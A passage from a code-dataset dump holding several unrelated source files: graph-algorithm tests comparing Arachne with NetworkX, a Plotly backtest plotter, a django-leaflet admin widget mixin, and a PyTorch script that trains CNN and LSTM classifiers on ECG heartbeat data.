search from each.\n vertices = ar_graph.nodes().to_list()\n\n ar_all_layers = []\n nx_all_layers = []\n for root in vertices:\n # Compute breadth-first search with Arachne.\n ar_layers = ar.bfs_layers(ar_graph, root).to_list()\n\n # Compute breadth-first search with NetworkX.\n nx_layer_dict = dict(enumerate(nx.bfs_layers(nx_graph, root)))\n nx_layers = [-1] * len(ar_layers)\n for layer,vertices_at_layer in nx_layer_dict.items():\n for vertex in vertices_at_layer:\n nx_layers[vertices.index(vertex)] = layer\n\n # Add both to corresponding layers tracker.\n ar_all_layers.append(ar_layers)\n nx_all_layers.append(nx_layers)\n\n return self.assertEqual(ar_all_layers, nx_all_layers)\n\n def test_square_count(self):\n \"\"\"Tests Arachne squares() and compares it against base case.\"\"\"\n # Read in graph with Arachne.\n ar_graph,_,_,_ = self.build_undirected_graph()\n\n # Get the square count.\n sc = ar.squares(ar_graph)\n\n return self.assertEqual(2, sc)\n\n def test_triangles(self):\n \"\"\"Tests Arachne triangles() and compares it against NetworkX.\"\"\"\n # Read in the graph with Arachne and NetworkX.\n ar_graph, nx_graph,_,_ = self.build_undirected_graph()\n nodes = [0,2,3,4]\n\n # Get triangle counts with Arachne.\n ar_tri_full = ar.triangles(ar_graph)\n ar_tri_partial = ar.triangles(ar_graph, ak.array(nodes))\n\n # Get triangle counts with NetworkX.\n nx_tri_full = nx.triangles(nx_graph)\n nx_tri_partial = nx.triangles(nx_graph, nodes)\n\n ret = [nx_tri_partial[v] for v in nodes]\n self.assertEqual(ret, ar_tri_partial.to_list())\n self.assertEqual(sum(nx_tri_full.values())/3, ar_tri_full/3)\n return True\n\n # FUNCTIONS BELOW ARE CURRENTLY NOT WORKING AND HAVE TO BE FIXED.\n # def test_connected_components(self):\n # # Process graph with Arachne.\n # filepath,directed,weighted,only_extension = self.get_graph_file_and_attributes()\n # ar_graph = ar.read_edgelist(filepath, directed=directed, weighted=weighted, filetype=only_extension)\n # ar_cc = ar.connected_components(ar_graph)\n\n # # Process graph with NetworkX.\n # nx_file = open(filepath, \"rb\")\n # nx_graph = nx.from_scipy_sparse_array(sp.io.mmread(nx_file))\n # nx_cc = nx.connected_components(nx_graph)\n\n # return self.assertEqual(len(list(nx_cc)), len(ak.unique(ar_cc)))\n\n # def test_k_truss(self):\n # # Process graph with Arachne.\n # filepath,directed,weighted,only_extension = self.get_graph_file_and_attributes()\n # ar_graph = ar.read_edgelist(filepath, directed=directed, weighted=weighted, filetype=only_extension)\n # ar_truss = ar.k_truss(ar_graph, 4)\n # ar_max_k = ar.k_truss(ar_graph, -1)\n\n # # Process graph with NetworkX.\n # nx_file = open(filepath, \"rb\")\n # nx_graph = nx.from_scipy_sparse_array(sp.io.mmread(nx_file))\n # nx_truss = nx.k_truss(nx_graph, 4)\n\n # max_k = 5\n \n # num_e_ar = ak.value_counts(ar_truss)[1][0]\n # num_e_nx = nx_truss.size()\n \n # max_test = self.assertEqual(ar_max_k[0], max_k)\n # truss_test = self.assertEqual(num_e_ar, num_e_nx)\n\n # # NOTE: truss decomposition NOT pytested, it uses code for both k_truss and max_truss.\n # return self.assertEqual(max_test,truss_test)\n \n # def test_triangle_centrality(self):\n # # Process graph with Arachne.\n # graph = ar.Graph()\n # src = ak.array([1, 1, 3, 3, 4, 4, 4, 5, 2, 2, 5, 5, 6])\n # dst = ak.array([3, 4, 4, 7, 7, 5, 8, 8, 5, 6, 6, 9, 9])\n # graph.add_edges_from(src, dst)\n\n # ar_tri_ctr = ar.triangle_centrality(graph).to_list()\n # ar_tri_ctr_true = [0.4, 0.4, 0.4666666666666667, 0.7333333333333333, 0.7333333333333333, 
0.4666666666666667, 0.4, 0.4666666666666667, 0.4]\n # print(ar_tri_ctr)\n\n # return self.assertEqual(ar_tri_ctr, ar_tri_ctr_true)\n\n\n\n","repo_name":"Bears-R-Us/arkouda-njit","sub_path":"arachne/test/algorithm_test.py","file_name":"algorithm_test.py","file_ext":"py","file_size_in_byte":7730,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"66"} +{"seq_id":"38090342429","text":"import pandas as pd\r\nimport plotly.express as px\r\nimport plotly.graph_objects as go\r\nfrom plotly.subplots import make_subplots\r\n\r\ndf = pd.read_csv(\"backtestResult.csv\")\r\n\r\nfig = make_subplots(rows=3, cols=1, shared_xaxes=True)\r\n\r\nfig.add_trace(go.Scatter(x=df.index,y=df.trade,name='Trade',mode='lines+markers',connectgaps=True, line=dict(color='firebrick', width=1.5, dash='dot')),row=1,col=1)\r\nfig.add_trace(go.Scatter(x=df.index,y=df.enter,name='Enter price',mode='lines',connectgaps=True, line=dict(color='orange', width=1.5)),row=1,col=1)\r\nfig.add_trace(go.Scatter(x=df.index,y=df.price,name='Price',mode='lines',connectgaps=True, line=dict(color='grey', width=2)),row=1,col=1)\r\nfig.add_trace(go.Scatter(x=df.index,y=df.asset,name='Asset',mode='lines',connectgaps=True, line=dict(color='purple', width=2)),row=2,col=1)\r\nfig.add_trace(go.Scatter(x=df.index,y=df.currency,name='Currency',mode='lines',connectgaps=True, line=dict(color='green', width=2)),row=3,col=1)\r\nfig.add_trace(go.Scatter(x=df.index,y=df.equity,name='Equity',mode='lines',connectgaps=True, line=dict(color='grey', width=2)),row=3,col=1)\r\nfig.add_trace(go.Scatter(x=df.index,y=df.budgetextra,name='Budget Extra',mode='lines',connectgaps=True, line=dict(color='darkgreen', width=1.5)),row=3,col=1)\r\n\r\nfig.update_traces(hovertemplate='%{y}')\r\nfig.update_layout(title_text=\"Backtest\", hovermode='x unified')\r\n\r\nfig.write_html(\"plottedResults.html\")","repo_name":"McxCZE/PlotlyDemonstration","sub_path":"plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"17627149353","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.contrib.admin import ModelAdmin\nfrom django.core.exceptions import ImproperlyConfigured\n\ntry:\n from djgeojson.fields import GeoJSONField\nexcept ImportError:\n GeoJSONField = type(object)\ntry:\n from django.contrib.gis.db.models import GeometryField\nexcept (ImportError, ImproperlyConfigured):\n # When GEOS is not installed\n GeometryField = type(object)\n\nfrom .forms.widgets import LeafletWidget\n\n\nclass LeafletGeoAdminMixin(object):\n widget = LeafletWidget\n map_template = 'leaflet/admin/widget.html'\n modifiable = True\n map_width = '100%'\n map_height = '400px'\n display_raw = False\n settings_overrides = {}\n\n def formfield_for_dbfield(self, db_field, **kwargs):\n \"\"\"\n Overloaded from ModelAdmin to set Leaflet widget\n in form field init params.\n \"\"\"\n is_geometry = isinstance(db_field, (GeometryField, GeoJSONField))\n is_editable = is_geometry and (db_field.dim < 3 or\n self.widget.supports_3d)\n\n if is_editable:\n kwargs.pop('request', None) # unsupported for form field\n # Setting the widget with the newly defined widget.\n kwargs['widget'] = self._get_map_widget(db_field)\n return db_field.formfield(**kwargs)\n else:\n return super(LeafletGeoAdminMixin, self).formfield_for_dbfield(db_field, **kwargs)\n\n def _get_map_widget(self, db_field):\n \"\"\"\n Overriden 
LeafletWidget with LeafletGeoAdmin params.\n \"\"\"\n class LeafletMap(self.widget):\n template_name = self.map_template\n include_media = True\n geom_type = db_field.geom_type\n modifiable = self.modifiable\n map_width = self.map_width\n map_height = self.map_height\n display_raw = self.display_raw\n settings_overrides = self.settings_overrides\n return LeafletMap\n\n\nclass LeafletGeoAdmin(LeafletGeoAdminMixin, ModelAdmin):\n pass\n","repo_name":"Grace-Amondi/Django-rest-framework-geospatial-tutorial","sub_path":"geaopienv/lib/python3.5/site-packages/leaflet/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"66"} +{"seq_id":"40487008833","text":"import os\nimport itertools\nimport time\nimport random\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\nimport seaborn as sns\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.optim import AdamW\nfrom torch.optim.lr_scheduler import (CosineAnnealingLR,\n CosineAnnealingWarmRestarts,\n StepLR,\n ExponentialLR)\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import precision_recall_curve\nfrom sklearn.metrics import classification_report, confusion_matrix\nfrom sklearn.metrics import accuracy_score, auc, f1_score, precision_score, recall_score\n\n\nclass Config:\n csv_path = ''\n seed = 2021\n device = 'cuda:0' if torch.cuda.is_available() else 'cpu'\n attn_state_path = 'input/mitbih-with-synthetic/attn.pth'\n lstm_state_path = 'input/mitbih-with-synthetic/lstm.pth'\n cnn_state_path = 'input/mitbih-with-synthetic/cnn.pth'\n\n attn_logs = 'input/mitbih-with-synthetic/attn.csv'\n lstm_logs = 'input/mitbih-with-synthetic/lstm.csv'\n cnn_logs = 'input/mitbih-with-synthetic/cnn.csv'\n\n train_csv_path = 'input/mitbih-with-synthetic/mitbih_with_syntetic_train.csv'\n test_csv_path = 'input/mitbih-with-synthetic/mitbih_with_syntetic_test.csv'\n\n\ndef seed_everything(seed: int):\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n if torch.cuda.is_available():\n torch.cuda.manual_seed(seed)\n\n\n\n# ## Dataset and DataLoader\n\n\nclass ECGDataset(Dataset):\n\n def __init__(self, df):\n self.df = df\n self.data_columns = self.df.columns[:-2].tolist()\n\n def __getitem__(self, idx):\n signal = self.df.loc[idx, self.data_columns].astype('float32')\n signal = torch.FloatTensor(np.array([signal.values]))\n target = torch.LongTensor(np.array(self.df.loc[idx, 'class']))\n return signal, target\n\n def __len__(self):\n return len(self.df)\n\ndef get_dataloader(phase: str, batch_size: int = 96) -> DataLoader:\n '''\n Dataset and DataLoader.\n Parameters:\n pahse: training or validation phase.\n batch_size: data per iteration.\n Returns:\n data generator\n '''\n df = pd.read_csv(config.train_csv_path)\n train_df, val_df = train_test_split(\n df, test_size=0.15, random_state=config.seed, stratify=df['label']\n )\n train_df, val_df = train_df.reset_index(drop=True), val_df.reset_index(drop=True)\n df = train_df if phase == 'train' else val_df\n dataset = ECGDataset(df)\n dataloader = DataLoader(dataset=dataset, batch_size=batch_size, num_workers=4)\n return dataloader\n\n\n# # Models\n\n\nclass Swish(nn.Module):\n def forward(self, x):\n return x * torch.sigmoid(x)\n\n\nclass 
ConvNormPool(nn.Module):\n \"\"\"Conv Skip-connection module\"\"\"\n\n def __init__(\n self,\n input_size,\n hidden_size,\n kernel_size,\n norm_type='bachnorm'\n ):\n super().__init__()\n\n self.kernel_size = kernel_size\n self.conv_1 = nn.Conv1d(\n in_channels=input_size,\n out_channels=hidden_size,\n kernel_size=kernel_size\n )\n self.conv_2 = nn.Conv1d(\n in_channels=hidden_size,\n out_channels=hidden_size,\n kernel_size=kernel_size\n )\n self.conv_3 = nn.Conv1d(\n in_channels=hidden_size,\n out_channels=hidden_size,\n kernel_size=kernel_size\n )\n self.swish_1 = Swish()\n self.swish_2 = Swish()\n self.swish_3 = Swish()\n if norm_type == 'group':\n self.normalization_1 = nn.GroupNorm(\n num_groups=8,\n num_channels=hidden_size\n )\n self.normalization_2 = nn.GroupNorm(\n num_groups=8,\n num_channels=hidden_size\n )\n self.normalization_3 = nn.GroupNorm(\n num_groups=8,\n num_channels=hidden_size\n )\n else:\n self.normalization_1 = nn.BatchNorm1d(num_features=hidden_size)\n self.normalization_2 = nn.BatchNorm1d(num_features=hidden_size)\n self.normalization_3 = nn.BatchNorm1d(num_features=hidden_size)\n\n self.pool = nn.MaxPool1d(kernel_size=2)\n\n def forward(self, input):\n conv1 = self.conv_1(input)\n x = self.normalization_1(conv1)\n x = self.swish_1(x)\n x = F.pad(x, pad=(self.kernel_size - 1, 0))\n\n x = self.conv_2(x)\n x = self.normalization_2(x)\n x = self.swish_2(x)\n x = F.pad(x, pad=(self.kernel_size - 1, 0))\n\n conv3 = self.conv_3(x)\n x = self.normalization_3(conv1 + conv3)\n x = self.swish_3(x)\n x = F.pad(x, pad=(self.kernel_size - 1, 0))\n\n x = self.pool(x)\n return x\n\n\nclass CNN(nn.Module):\n def __init__(\n self,\n input_size=1,\n hid_size=256,\n kernel_size=5,\n num_classes=5,\n ):\n super().__init__()\n\n self.conv1 = ConvNormPool(\n input_size=input_size,\n hidden_size=hid_size,\n kernel_size=kernel_size,\n )\n self.conv2 = ConvNormPool(\n input_size=hid_size,\n hidden_size=hid_size // 2,\n kernel_size=kernel_size,\n )\n self.conv3 = ConvNormPool(\n input_size=hid_size // 2,\n hidden_size=hid_size // 4,\n kernel_size=kernel_size,\n )\n self.avgpool = nn.AdaptiveAvgPool1d((1))\n self.fc = nn.Linear(in_features=hid_size // 4, out_features=num_classes)\n\n def forward(self, input):\n x = self.conv1(input)\n x = self.conv2(x)\n x = self.conv3(x)\n x = self.avgpool(x)\n # print(x.shape) # num_features * num_channels\n x = x.view(-1, x.size(1) * x.size(2))\n x = F.softmax(self.fc(x), dim=1)\n return x\n\n\nclass RNN(nn.Module):\n \"\"\"RNN module(cell type lstm or gru)\"\"\"\n\n def __init__(\n self,\n input_size,\n hid_size,\n num_rnn_layers=1,\n dropout_p=0.2,\n bidirectional=False,\n rnn_type='lstm',\n ):\n super().__init__()\n\n if rnn_type == 'lstm':\n self.rnn_layer = nn.LSTM(\n input_size=input_size,\n hidden_size=hid_size,\n num_layers=num_rnn_layers,\n dropout=dropout_p if num_rnn_layers > 1 else 0,\n bidirectional=bidirectional,\n batch_first=True,\n )\n\n else:\n self.rnn_layer = nn.GRU(\n input_size=input_size,\n hidden_size=hid_size,\n num_layers=num_rnn_layers,\n dropout=dropout_p if num_rnn_layers > 1 else 0,\n bidirectional=bidirectional,\n batch_first=True,\n )\n\n def forward(self, input):\n outputs, hidden_states = self.rnn_layer(input)\n return outputs, hidden_states\n\n\nclass RNNModel(nn.Module):\n def __init__(\n self,\n input_size,\n hid_size,\n rnn_type,\n bidirectional,\n n_classes=5,\n kernel_size=5,\n ):\n super().__init__()\n\n self.rnn_layer = RNN(\n input_size=46, # hid_size * 2 if bidirectional else hid_size,\n hid_size=hid_size,\n 
rnn_type=rnn_type,\n bidirectional=bidirectional\n )\n self.conv1 = ConvNormPool(\n input_size=input_size,\n hidden_size=hid_size,\n kernel_size=kernel_size,\n )\n self.conv2 = ConvNormPool(\n input_size=hid_size,\n hidden_size=hid_size,\n kernel_size=kernel_size,\n )\n self.avgpool = nn.AdaptiveAvgPool1d((1))\n self.fc = nn.Linear(in_features=hid_size, out_features=n_classes)\n\n def forward(self, input):\n x = self.conv1(input)\n x = self.conv2(x)\n x, _ = self.rnn_layer(x)\n x = self.avgpool(x)\n x = x.view(-1, x.size(1) * x.size(2))\n x = F.softmax(self.fc(x), dim=1) # .squeeze(1)\n return x\n\n\nclass RNNAttentionModel(nn.Module):\n def __init__(\n self,\n input_size,\n hid_size,\n rnn_type,\n bidirectional,\n n_classes=5,\n kernel_size=5,\n ):\n super().__init__()\n\n self.rnn_layer = RNN(\n input_size=46,\n hid_size=hid_size,\n rnn_type=rnn_type,\n bidirectional=bidirectional\n )\n self.conv1 = ConvNormPool(\n input_size=input_size,\n hidden_size=hid_size,\n kernel_size=kernel_size,\n )\n self.conv2 = ConvNormPool(\n input_size=hid_size,\n hidden_size=hid_size,\n kernel_size=kernel_size,\n )\n self.avgpool = nn.AdaptiveMaxPool1d((1))\n self.attn = nn.Linear(hid_size, hid_size, bias=False)\n self.fc = nn.Linear(in_features=hid_size, out_features=n_classes)\n\n def forward(self, input):\n x = self.conv1(input)\n x = self.conv2(x)\n x_out, hid_states = self.rnn_layer(x)\n x = torch.cat([hid_states[0], hid_states[1]], dim=0).transpose(0, 1)\n x_attn = torch.tanh(self.attn(x))\n x = x_attn.bmm(x_out)\n x = x.transpose(2, 1)\n x = self.avgpool(x)\n x = x.view(-1, x.size(1) * x.size(2))\n x = F.softmax(self.fc(x), dim=-1)\n return x\n\n\n# # Training Stage\n\nclass Meter:\n def __init__(self, n_classes=5):\n self.metrics = {}\n self.confusion = torch.zeros((n_classes, n_classes))\n\n def update(self, x, y, loss):\n x = np.argmax(x.detach().cpu().numpy(), axis=1)\n y = y.detach().cpu().numpy()\n self.metrics['loss'] += loss\n self.metrics['accuracy'] += accuracy_score(x, y)\n self.metrics['f1'] += f1_score(x, y, average='macro')\n self.metrics['precision'] += precision_score(x, y, average='macro', zero_division=1)\n self.metrics['recall'] += recall_score(x, y, average='macro', zero_division=1)\n\n self._compute_cm(x, y)\n\n def _compute_cm(self, x, y):\n for prob, target in zip(x, y):\n if prob == target:\n self.confusion[target][target] += 1\n else:\n self.confusion[target][prob] += 1\n\n def init_metrics(self):\n self.metrics['loss'] = 0\n self.metrics['accuracy'] = 0\n self.metrics['f1'] = 0\n self.metrics['precision'] = 0\n self.metrics['recall'] = 0\n\n def get_metrics(self):\n return self.metrics\n\n def get_confusion_matrix(self):\n return self.confusion\n\n\nclass Trainer:\n def __init__(self, net, lr, batch_size, num_epochs):\n self.net = net.to(config.device)\n self.num_epochs = num_epochs\n self.criterion = nn.CrossEntropyLoss()\n self.optimizer = AdamW(self.net.parameters(), lr=lr)\n self.scheduler = CosineAnnealingLR(self.optimizer, T_max=num_epochs, eta_min=5e-6)\n self.best_loss = float('inf')\n self.phases = ['train', 'val']\n self.dataloaders = {\n phase: get_dataloader(phase, batch_size) for phase in self.phases\n }\n self.train_df_logs = pd.DataFrame()\n self.val_df_logs = pd.DataFrame()\n\n def _train_epoch(self, phase):\n print(f\"{phase} mode | time: {time.strftime('%H:%M:%S')}\")\n\n self.net.train() if phase == 'train' else self.net.eval()\n meter = Meter()\n meter.init_metrics()\n\n for i, (data, target) in enumerate(self.dataloaders[phase]):\n data = 
data.to(config.device)\n            target = target.to(config.device)\n\n            output = self.net(data)\n            loss = self.criterion(output, target)\n\n            if phase == 'train':\n                self.optimizer.zero_grad()\n                loss.backward()\n                self.optimizer.step()\n\n            meter.update(output, target, loss.item())\n\n        metrics = meter.get_metrics()\n        # average the accumulated metrics over the number of batches\n        metrics = {k: v / (i + 1) for k, v in metrics.items()}\n        df_logs = pd.DataFrame([metrics])\n        confusion_matrix = meter.get_confusion_matrix()\n\n        if phase == 'train':\n            self.train_df_logs = pd.concat([self.train_df_logs, df_logs], axis=0)\n        else:\n            self.val_df_logs = pd.concat([self.val_df_logs, df_logs], axis=0)\n\n        # show logs\n        print('{}: {}, {}: {}, {}: {}, {}: {}, {}: {}'\n              .format(*(x for kv in metrics.items() for x in kv))\n              )\n        fig, ax = plt.subplots(figsize=(5, 5))\n        cm_ = ax.imshow(confusion_matrix, cmap='hot')\n        ax.set_title('Confusion matrix', fontsize=15)\n        ax.set_xlabel('Actual', fontsize=13)\n        ax.set_ylabel('Predicted', fontsize=13)\n        plt.colorbar(cm_)\n        plt.show()\n\n        return loss\n\n    def run(self):\n        for epoch in range(self.num_epochs):\n            self._train_epoch(phase='train')\n            with torch.no_grad():\n                val_loss = self._train_epoch(phase='val')\n                self.scheduler.step()\n\n            if val_loss < self.best_loss:\n                self.best_loss = val_loss\n                print('\\nNew checkpoint\\n')\n                torch.save(self.net.state_dict(), f\"best_model_epoch{epoch}.pth\")\n                # clear_output()\n\n\ndef make_test_stage(dataloader, model, probs=False):\n    cls_predictions = []\n    cls_ground_truths = []\n\n    for i, (data, cls_target) in enumerate(dataloader):\n        with torch.no_grad():\n\n            data = data.to(config.device)\n            cls_target = cls_target.cpu()\n            cls_prediction = model(data)\n\n            if not probs:\n                cls_prediction = torch.argmax(cls_prediction, dim=1)\n\n            cls_predictions.append(cls_prediction.detach().cpu())\n            cls_ground_truths.append(cls_target)\n\n    predictions_cls = torch.cat(cls_predictions).numpy()\n    ground_truths_cls = torch.cat(cls_ground_truths).numpy()\n    return predictions_cls, ground_truths_cls\n\n\nif __name__ == '__main__':\n    config = Config()\n    seed_everything(config.seed)\n\n    df_ptbdb = pd.read_csv('input/heartbeat/ptbdb_abnormal.csv')\n    df_mitbih = pd.read_csv('input/heartbeat/mitbih_train.csv')\n    df_ptbdb\n\n    df_mitbih_train = pd.read_csv('input/heartbeat/mitbih_train.csv', header=None)\n    df_mitbih_test = pd.read_csv('input/heartbeat/mitbih_test.csv', header=None)\n    df_mitbih = pd.concat([df_mitbih_train, df_mitbih_test], axis=0)\n    df_mitbih.rename(columns={187: 'class'}, inplace=True)\n\n    id_to_label = {\n        0: \"Normal\",\n        1: \"Atrial Premature\",\n        2: \"Premature ventricular contraction\",\n        3: \"Fusion of ventricular and normal\",\n        4: \"Fusion of paced and normal\"\n    }\n    df_mitbih['label'] = df_mitbih.iloc[:, -1].map(id_to_label)\n    print(df_mitbih.info())\n\n    # In[ ]:\n\n    df_mitbih.to_csv('data.csv', index=False)\n    config.csv_path = 'data.csv'\n\n    # # Basic EDA\n\n    # In[ ]:\n\n    df_mitbih = pd.read_csv(config.csv_path)\n    df_mitbih['label'].value_counts()\n\n    # In[ ]:\n\n    percentages = [count / df_mitbih.shape[0] * 100 for count in df_mitbih['label'].value_counts()]\n\n    fig, ax = plt.subplots(figsize=(12, 6))\n    sns.countplot(\n        x=df_mitbih['label'],\n        ax=ax,\n        palette=\"bright\",\n        order=df_mitbih['label'].value_counts().index\n    )\n    ax.set_xticklabels(ax.get_xticklabels(), rotation=15);\n\n    for percentage, count, p in zip(\n            percentages,\n            df_mitbih['label'].value_counts(sort=True).values,\n            ax.patches):\n        percentage = f'{np.round(percentage, 2)}%'\n        x = p.get_x() + p.get_width() / 2 - 0.4\n        y = 
p.get_y() + p.get_height()\n ax.annotate(str(percentage) + \" / \" + str(count), (x, y), fontsize=12, fontweight='bold')\n\n plt.savefig('data_dist.png', facecolor='w', edgecolor='w', format='png',\n transparent=False, bbox_inches='tight', pad_inches=0.1)\n plt.savefig('data_dist.svg', facecolor='w', edgecolor='w', format='svg',\n transparent=False, bbox_inches='tight', pad_inches=0.1)\n\n # I used the GAN from the notebook you can find [here](https://www.kaggle.com/polomarco/1d-gan-for-ecg-synthesis) or a repository with the code [here](https://github.com/mandrakedrink/ECG-Synthesis-and-Classification) to generate new synthetic data for classes with little data, now the dataset looks like this:\n\n # In[ ]:\n\n config.csv_path = 'input/mitbih-with-synthetic/mitbih_with_syntetic.csv'\n df_mitbih_new = pd.read_csv(config.csv_path)\n percentages1 = [count / df_mitbih.shape[0] * 100 for count in df_mitbih['label'].value_counts()]\n percentages2 = [count / df_mitbih_new.shape[0] * 100 for count in df_mitbih_new['label'].value_counts()]\n\n fig, axs = plt.subplots(1, 2, figsize=(18, 4))\n\n # origin\n sns.countplot(\n x=df_mitbih['label'],\n ax=axs[0],\n palette=\"bright\",\n order=df_mitbih['label'].value_counts().index\n )\n axs[0].set_xticklabels(axs[0].get_xticklabels(), rotation=15);\n axs[0].set_title(\"Before\", fontsize=15)\n\n for percentage, count, p in zip(\n percentages1,\n df_mitbih['label'].value_counts(sort=True).values,\n axs[0].patches):\n percentage = f'{np.round(percentage, 2)}%'\n x = p.get_x() + p.get_width() / 2 - 0.4\n y = p.get_y() + p.get_height()\n axs[0].annotate(str(percentage) + \" / \" + str(count), (x, y), fontsize=10, fontweight='bold')\n\n # with synthetic\n sns.countplot(\n x=df_mitbih_new['label'],\n ax=axs[1],\n palette=\"bright\",\n order=df_mitbih_new['label'].value_counts().index\n )\n axs[1].set_xticklabels(axs[1].get_xticklabels(), rotation=15);\n axs[1].set_title(\"After\", fontsize=15)\n\n for percentage, count, p in zip(\n percentages2,\n df_mitbih_new['label'].value_counts(sort=True).values,\n axs[1].patches):\n percentage = f'{np.round(percentage, 2)}%'\n x = p.get_x() + p.get_width() / 2 - 0.4\n y = p.get_y() + p.get_height()\n axs[1].annotate(str(percentage) + \" / \" + str(count), (x, y), fontsize=10, fontweight='bold')\n\n # plt.suptitle(\"Balanced Sampling between classes\", fontsize=20, weight=\"bold\", y=1.01)\n plt.savefig('data_dist.png', facecolor='w', edgecolor='w', format='png',\n transparent=False, bbox_inches='tight', pad_inches=0.1)\n plt.savefig('data_dist.svg', facecolor='w', edgecolor='w', format='svg',\n transparent=False, bbox_inches='tight', pad_inches=0.1)\n\n # In[ ]:\n\n N = 5\n samples = [df_mitbih.loc[df_mitbih['class'] == cls].sample(N) for cls in range(N)]\n titles = [id_to_label[cls] for cls in range(5)]\n\n with plt.style.context(\"seaborn-white\"):\n fig, axs = plt.subplots(3, 2, figsize=(20, 7))\n for i in range(5):\n ax = axs.flat[i]\n ax.plot(samples[i].values[:, :-2].transpose())\n ax.set_title(titles[i])\n # plt.ylabel(\"Amplitude\")\n\n plt.tight_layout()\n plt.suptitle(\"ECG Signals\", fontsize=20, y=1.05, weight=\"bold\")\n plt.savefig(f\"signals_per_class.svg\",\n format=\"svg\", bbox_inches='tight', pad_inches=0.2)\n\n plt.savefig(f\"signals_per_class.png\",\n format=\"png\", bbox_inches='tight', pad_inches=0.2)\n\n # get_ipython().run_cell_magic('time', '', \"signals = [' '.join(df_mitbih.iloc[i, :-1].apply(str).values) for i in range(df_mitbih.shape[0])]\\ny = df_mitbih.iloc[:, 
-1].values.tolist()\\nprint(len(signals), len(y))\\n\\nprint(f'data has {len(set([sig for line in signals for sig in line.split()]))} out of 16 372 411 unique values.')\")\n\n # Dataset and DataLoader\n x = torch.linspace(-10.0, 10.0, 100)\n swish = Swish()\n swish_out = swish(x)\n relu_out = torch.relu(x)\n\n plt.title('Swish function')\n plt.plot(x.numpy(), swish_out.numpy(), label='Swish')\n plt.plot(x.numpy(), relu_out.numpy(), label='ReLU')\n plt.legend();\n plt.show()\n\n # model = RNNAttentionModel(1, 64, 'lstm', False)\n # model = RNNModel(1, 64, 'lstm', True)\n model = CNN(num_classes=5, hid_size=128)\n #train model?\n trainer = Trainer(net=model, lr=1e-3, batch_size=96, num_epochs=10) # 100)\n trainer.run()\n\n train_logs = trainer.train_df_logs\n train_logs.columns = [\"train_\" + colname for colname in train_logs.columns]\n val_logs = trainer.val_df_logs\n val_logs.columns = [\"val_\" + colname for colname in val_logs.columns]\n\n logs = pd.concat([train_logs, val_logs], axis=1)\n logs.reset_index(drop=True, inplace=True)\n logs = logs.loc[:, [\n 'train_loss', 'val_loss',\n 'train_accuracy', 'val_accuracy',\n 'train_f1', 'val_f1',\n 'train_precision', 'val_precision',\n 'train_recall', 'val_recall']\n ]\n logs.head()\n logs.to_csv('cnn.csv', index=False)\n\n # # Experiments and Results\n\n cnn_model = CNN(num_classes=5, hid_size=128).to(config.device)\n cnn_model.load_state_dict(\n torch.load(config.cnn_state_path,\n map_location=config.device)\n );\n cnn_model.eval();\n logs = pd.read_csv(config.cnn_logs)\n\n colors = ['#C042FF', '#03C576FF', '#FF355A', '#03C5BF', '#96C503', '#C5035B']\n palettes = [sns.color_palette(colors, 2),\n sns.color_palette(colors, 4),\n sns.color_palette(colors[:2] + colors[-2:] + colors[2:-2], 6)]\n\n fig, ax = plt.subplots(1, 2, figsize=(12, 4))\n\n sns.lineplot(data=logs.iloc[:, :2], palette=palettes[0], markers=True, ax=ax[0], linewidth=2.5, )\n ax[0].set_title(\"Loss Function during Model Training\", fontsize=14)\n ax[0].set_xlabel(\"Epoch\", fontsize=14)\n\n sns.lineplot(data=logs.iloc[:, 2:6], palette=palettes[1], markers=True, ax=ax[1], linewidth=2.5, legend=\"full\")\n ax[1].set_title(\"Metrics during Model Training\", fontsize=15)\n ax[1].set_xlabel(\"Epoch\", fontsize=14)\n\n plt.suptitle('CNN Model', fontsize=18)\n\n plt.tight_layout()\n fig.savefig(\"cnn.png\", format=\"png\", pad_inches=0.2, transparent=False, bbox_inches='tight')\n fig.savefig(\"cnn.svg\", format=\"svg\", pad_inches=0.2, transparent=False, bbox_inches='tight')\n\n\n lstm_model = RNNModel(1, 64, 'lstm', True).to(config.device)\n lstm_model.load_state_dict(\n torch.load(config.lstm_state_path,\n map_location=config.device)\n );\n lstm_model.eval();\n logs = pd.read_csv(config.lstm_logs)\n\n colors = ['#C042FF', '#03C576FF', '#FF355A', '#03C5BF', '#96C503', '#C5035B']\n palettes = [sns.color_palette(colors, 2),\n sns.color_palette(colors, 4),\n sns.color_palette(colors[:2] + colors[-2:] + colors[2:-2], 6)]\n\n fig, ax = plt.subplots(1, 2, figsize=(12, 4))\n\n sns.lineplot(data=logs.iloc[:, :2], palette=palettes[0], markers=True, ax=ax[0], linewidth=2.5, )\n ax[0].set_title(\"Loss Function during Model Training\", fontsize=14)\n ax[0].set_xlabel(\"Epoch\", fontsize=14)\n\n sns.lineplot(data=logs.iloc[:, 2:6], palette=palettes[1], markers=True, ax=ax[1], linewidth=2.5, legend=\"full\")\n ax[1].set_title(\"Metrics during Model Training\", fontsize=15)\n ax[1].set_xlabel(\"Epoch\", fontsize=14)\n\n plt.suptitle('CNN+LSTM Model', fontsize=18)\n\n plt.tight_layout()\n 
